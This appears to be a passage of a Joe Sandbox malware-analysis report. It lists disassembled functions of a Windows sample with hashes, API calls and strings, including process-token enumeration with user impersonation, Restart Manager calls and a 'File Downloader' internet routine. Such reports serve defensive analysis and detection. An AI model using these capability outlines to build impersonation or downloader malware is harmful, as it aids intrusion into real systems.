Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7dbd699fb3bd762dbe675c4fc42dbf179cbe829f533610fd9071a5c01d9a8f
Instruction ID: 3863a44b4ad518794f570fa3c83c867ddc41d33737748cc29fed38b08f75ff66
Opcode Fuzzy Hash: 7d7dbd699fb3bd762dbe675c4fc42dbf179cbe829f533610fd9071a5c01d9a8f
Instruction Fuzzy Hash: 63F062B1B1C6958ADFA48F29A84266977D0E708384F908039D69DC3B18DA3C91618F85

Function 00007FF6218BF498 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261fe6521d892542d75bab8d3c7c41f58578a8ad23917a021c9647768b8a2587
Instruction ID: 0cde49746a94ae3b958d643e678242463d281e9f6bffff01b26d4a10e2fb7fd0
Opcode Fuzzy Hash: 261fe6521d892542d75bab8d3c7c41f58578a8ad23917a021c9647768b8a2587
Instruction Fuzzy Hash: CCA0022590CC03E4EF058F40ECD00342370FB50351B800031E00DC64609F3CA741C31A

Function 00007FF621867C00 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 202COMMON

Download Yara Rule

Strings

object is not closed with '}', xrefs: 00007FF62186920F
quote was opened but not closed., xrefs: 00007FF621869236, 00007FF6218692AB
unexpected key without object, xrefs: 00007FF6218692EA
word wasnt properly ended, xrefs: 00007FF621869365, 00007FF6218693EC
unexpected '}', xrefs: 00007FF621869413
No closed word, xrefs: 00007FF621869317, 00007FF62186933E
key declared, but no value, xrefs: 00007FF62186925D, 00007FF621869284, 00007FF621869398
key opened, but never closed, xrefs: 00007FF6218693BF

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID: No closed word$key declared, but no value$key opened, but never closed$object is not closed with '}'$quote was opened but not closed.$unexpected '}'$unexpected key without object$word wasnt properly ended
API String ID: 0-2700065129
Opcode ID: 59df1e26edf9c5ce0cbe6cafc074fc1b1d31edfecee5b8fe680e87cf8b5536ed
Instruction ID: bbc2cf414eca4f5922886ce627320a39ecf708e568b638ba8672d4d8ca2175ae
Opcode Fuzzy Hash: 59df1e26edf9c5ce0cbe6cafc074fc1b1d31edfecee5b8fe680e87cf8b5536ed
Instruction Fuzzy Hash: B7B10E7291DAC699EF70EF24DC907E83364EB54348F805632D64DCA9AADF2CD24AC701

Function 00007FF621884A30 Relevance: 28.7, APIs: 19, Instructions: 177processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF621884A86
Process32FirstW.KERNEL32 ref: 00007FF621884ACA
Process32NextW.KERNEL32 ref: 00007FF621884ADF
OpenProcess.KERNEL32 ref: 00007FF621884B1B
OpenProcessToken.ADVAPI32 ref: 00007FF621884B42
GetTokenInformation.ADVAPI32 ref: 00007FF621884B6E
GetLastError.KERNEL32 ref: 00007FF621884B7C
GetTokenInformation.ADVAPI32 ref: 00007FF621884BBC
ConvertSidToStringSidA.ADVAPI32 ref: 00007FF621884BD3
CloseHandle.KERNEL32 ref: 00007FF621884C46
CloseHandle.KERNEL32 ref: 00007FF621884C51
CloseHandle.KERNEL32 ref: 00007FF621884CB6
Process32NextW.KERNEL32 ref: 00007FF621884CC3
CloseHandle.KERNEL32 ref: 00007FF621884CE9
CloseHandle.KERNEL32 ref: 00007FF621884CF2
CloseHandle.KERNEL32 ref: 00007FF621884D07

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
String ID:
API String ID: 3925315391-0
Opcode ID: b7cdb7a7c6588e50aaab37c0fa57b8db1cd1071ffc72c1321cf755afb8342ce3
Instruction ID: 3eb190d8224f65131b8ed3f5f639c630337772db1c242ebda7a8b48a9a7d636d
Opcode Fuzzy Hash: b7cdb7a7c6588e50aaab37c0fa57b8db1cd1071ffc72c1321cf755afb8342ce3
Instruction Fuzzy Hash: B8814A36A1CB8682EB508F66EC8066AA3A5FB88B94F414135EE8DC7B58DF7CD505C701

Function 00007FF621885180 Relevance: 18.5, APIs: 12, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF621884A30: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF621884A86
Part of subcall function 00007FF621884A30: Process32FirstW.KERNEL32 ref: 00007FF621884ACA
Part of subcall function 00007FF621884A30: Process32NextW.KERNEL32 ref: 00007FF621884ADF
Part of subcall function 00007FF621884A30: OpenProcess.KERNEL32 ref: 00007FF621884B1B
Part of subcall function 00007FF621884A30: OpenProcessToken.ADVAPI32 ref: 00007FF621884B42
Part of subcall function 00007FF621884A30: CloseHandle.KERNEL32 ref: 00007FF621884CB6
Part of subcall function 00007FF621884A30: Process32NextW.KERNEL32 ref: 00007FF621884CC3
Part of subcall function 00007FF621884A30: CloseHandle.KERNEL32 ref: 00007FF621884D07

ImpersonateLoggedOnUser.ADVAPI32 ref: 00007FF6218856C8
RevertToSelf.ADVAPI32 ref: 00007FF6218856E6
ImpersonateLoggedOnUser.ADVAPI32 ref: 00007FF6218851DD

Part of subcall function 00007FF62183F380: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183F3E3

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858D5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858ED
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858F3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218858F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621885905

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Process32$CloseHandleImpersonateLoggedNextOpenProcessUser$CreateFirstRevertSelfSnapshotTokenToolhelp32
String ID:
API String ID: 2435156947-0
Opcode ID: 395bbae01daf68b249928c43aee7709cbe51f4118187a820c15c0636d4dde12d
Instruction ID: 339ed1bebe8c85898f2a1a1ef057ed322ad24281b682700db5f7f0f883c845f7
Opcode Fuzzy Hash: 395bbae01daf68b249928c43aee7709cbe51f4118187a820c15c0636d4dde12d
Instruction Fuzzy Hash: B522C662E1C78586FF009B68D8843AD67A2FB417E4F105231EA6DC6ADADF7CD484C302

Function 00007FF62185B780 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 365COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185BCDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185BCE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185BCE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185BCEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185BCF2

Strings

while parsing , xrefs: 00007FF62185B828
syntax error , xrefs: 00007FF62185B7BF
; last read: ', xrefs: 00007FF62185B9AC
; expected , xrefs: 00007FF62185BC37
unexpected , xrefs: 00007FF62185BB37

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3668304517-4239264347
Opcode ID: 6c3148047886b6a8126b5690575d8c43fec0f38bb0686e9863bf30b4c1b91960
Instruction ID: b6c406e6b29733aac41dab74a43ca3ba45cde9ef463ae0df1caa185613367f86
Opcode Fuzzy Hash: 6c3148047886b6a8126b5690575d8c43fec0f38bb0686e9863bf30b4c1b91960
Instruction Fuzzy Hash: 69F1A4A2F08A8199FF10DBA1D8803AD2B72EB117A8F614235DE1DD7AC9DF7C9485D341

Function 00007FF6218A0254 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0283
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0353

Strings

0, xrefs: 00007FF6218A038F
0, xrefs: 00007FF6218A0325
0, xrefs: 00007FF6218A037D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0
API String ID: 3215553584-3137946472
Opcode ID: 4b936a4394e80428ad7bf41d875096a3e7add69c0315c25dc0869b4c3066c4ac
Instruction ID: d59b0718268f79ed6947ab2b5c471038cd0ffe4f5f9e56e8d47e08ce380f4ca6
Opcode Fuzzy Hash: 4b936a4394e80428ad7bf41d875096a3e7add69c0315c25dc0869b4c3066c4ac
Instruction Fuzzy Hash: 14E1A43290E68687FF618E2489D02BD2795AB5AB88F548032D78CC77D6DE3DA4598703

Function 00007FF62183DCE0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 281COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF62183DD3F

Part of subcall function 00007FF6218CB260: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF621865C46,?,?,00000000,00000000,?,00000000,?,00007FF62184786D), ref: 00007FF6218CB272

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183DF52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183DF58
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62183DFE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183E00D
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62183E0A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183E0AD

Strings

", ", xrefs: 00007FF62183DE2D
: ", xrefs: 00007FF62183DDFA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$ApisFile__std_fs_code_page
String ID: ", "$: "
API String ID: 1991941009-747220369
Opcode ID: 69ddcca7b6c6b2eb7d281db778ca51aca7ff15eb29e71ad144687959ad1282d9
Instruction ID: 534e60177a34d080c17f475c147912fc8fe9b741f88befd34372304780e94118
Opcode Fuzzy Hash: 69ddcca7b6c6b2eb7d281db778ca51aca7ff15eb29e71ad144687959ad1282d9
Instruction Fuzzy Hash: E4B1CC62B08A4086EF00DF25E8803AD2361EB44B88F544531EE5DC7B9AEF3DD496C381

Function 00007FF62188AEA0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62188AF1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF62188AF65
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62188B0E1
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62188B0F4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62188B0FA

Strings

false, xrefs: 00007FF62188AFED
true, xrefs: 00007FF62188B01C
bad locale name, xrefs: 00007FF62188B0E7

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 9652e04b345fc3363a0a857664cbfa5d9c830016e5b02a08348af358dc2ccedb
Instruction ID: 163fc2b2d435563d48f1cd46405a682f6d94d28cd59a3eeac9fa016af0ae3aed
Opcode Fuzzy Hash: 9652e04b345fc3363a0a857664cbfa5d9c830016e5b02a08348af358dc2ccedb
Instruction Fuzzy Hash: A1714B22F0DB418AEB15DF64E8902AC33A5EF84748F054139DA4DE7A9ADF3CA511D386

Function 00007FF621899B70 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF621899BA1
GetProcessId.KERNEL32 ref: 00007FF621899BAA
RmStartSession.RSTRTMGR ref: 00007FF621899BCA
RmRegisterResources.RSTRTMGR ref: 00007FF621899BF5
RmGetList.RSTRTMGR ref: 00007FF621899C2E
RmGetList.RSTRTMGR ref: 00007FF621899C90
RmEndSession.RSTRTMGR ref: 00007FF621899CCB
RmEndSession.RSTRTMGR ref: 00007FF621899D02
RmEndSession.RSTRTMGR ref: 00007FF621899D17

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Session$ListProcess$CurrentRegisterResourcesStart
String ID:
API String ID: 3299295986-0
Opcode ID: 4ddc3a5b4f8c6342cd3dcf0c0e78daa6693b2bbe667ef408570da53bc05ca548
Instruction ID: eb8a3ac60f54fc3f17a83dd13a566d855a710239ef86784592b4dfbdd36a5568
Opcode Fuzzy Hash: 4ddc3a5b4f8c6342cd3dcf0c0e78daa6693b2bbe667ef408570da53bc05ca548
Instruction Fuzzy Hash: 6D51FE36F18A528AFB14CFA5E8906AD33B5BB48748F504139EA0EE7B94DE3CD905C741

Function 00007FF6218C1A44 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6218C1AA1

Part of subcall function 00007FF6218C3E5C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6218C3E9F
Part of subcall function 00007FF6218C3E5C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6218C3EC4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6218C1B79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6218C1DC7
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6218C1ED4

Strings

csm, xrefs: 00007FF6218C1ABB
csm, xrefs: 00007FF6218C1B9C
csm, xrefs: 00007FF6218C1B22

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 93094d183b60bcbe653e0156645cfa8f2fca202be6890cc91cb0939cc453230d
Instruction ID: 74b5fdfbf8fd14d1810acfef0048ec2278e0638e0ed387ae548e73fcfe6213ba
Opcode Fuzzy Hash: 93094d183b60bcbe653e0156645cfa8f2fca202be6890cc91cb0939cc453230d
Instruction Fuzzy Hash: 88D15C22A1CB4286EF649B6598C03BD67A0FB55788F104235EA4DD7BD6DF3CE091CB42

Function 00007FF621859990 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF621859A00
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF621859A48
_Getcoll.LIBCPMT ref: 00007FF621859A7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621859B7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621859BF6

Strings

bad locale name, xrefs: 00007FF621859B81

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstd::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 2486341784-1405518554
Opcode ID: 82450da1def969d8b7663212aa1ee6fe0718d9ea3e6de469293146cbad3081f2
Instruction ID: e722b5f66a84977f8636fb1767aee1f90a40e62c959bd816bbcf1683f69b40b7
Opcode Fuzzy Hash: 82450da1def969d8b7663212aa1ee6fe0718d9ea3e6de469293146cbad3081f2
Instruction Fuzzy Hash: E0918B22F09B819AFF149FA5E8903AD7361EF44B88F044135DE5ED7A9ADE3CD4518382

Function 00007FF6218ADB5C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,00007FF6218AE206,?,?,00000030,00007FF6218B5408,?,?,?,?,?,?,?,?), ref: 00007FF6218ADCD8
GetProcAddress.KERNEL32(?,00000000,00007FF6218AE206,?,?,00000030,00007FF6218B5408,?,?,?,?,?,?,?,?), ref: 00007FF6218ADCE4

Strings

ext-ms-, xrefs: 00007FF6218ADC35
api-ms-, xrefs: 00007FF6218ADC22

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: ca7c09baf792878f96d911292d21648074434898d998409f668d6f16be7d0add
Instruction ID: c204bf535bb3578157479c1f6bedc1b168753d09777e6a0b22cd8bc08f5d83ba
Opcode Fuzzy Hash: ca7c09baf792878f96d911292d21648074434898d998409f668d6f16be7d0add
Instruction Fuzzy Hash: 2D41EE22B1DA0282EF16CB169C8027623D5BF09BE0F884235ED1DC77C8EE7DE8058342

Function 00007FF62188B2D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF62188B33B
InternetOpenUrlA.WININET ref: 00007FF62188B370
InternetReadFile.WININET ref: 00007FF62188B391
InternetReadFile.WININET ref: 00007FF62188B3CF
InternetCloseHandle.WININET ref: 00007FF62188B3DC
InternetCloseHandle.WININET ref: 00007FF62188B3E5

Strings

File Downloader, xrefs: 00007FF62188B334

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Internet$CloseFileHandleOpenRead
String ID: File Downloader
API String ID: 4038090926-3631955488
Opcode ID: 2d8777ee4260c80b314c9bed156458a8780df2b315401914807f3b6119ccca09
Instruction ID: 2f6b373eaf236805f3605470fe0fd4366911e1a7ae330c3a29a8ec197095a74e
Opcode Fuzzy Hash: 2d8777ee4260c80b314c9bed156458a8780df2b315401914807f3b6119ccca09
Instruction Fuzzy Hash: 63317032A0CB8586EB208F15E8906AAB3A1FB88BC4F544135EE4DC3B58DF7CE5418B01

Function 00007FF6218A38F0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A3933
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A3D20
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A3FBC

Strings

f, xrefs: 00007FF6218A3A55
p, xrefs: 00007FF6218A39E5
p, xrefs: 00007FF6218A3A5D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
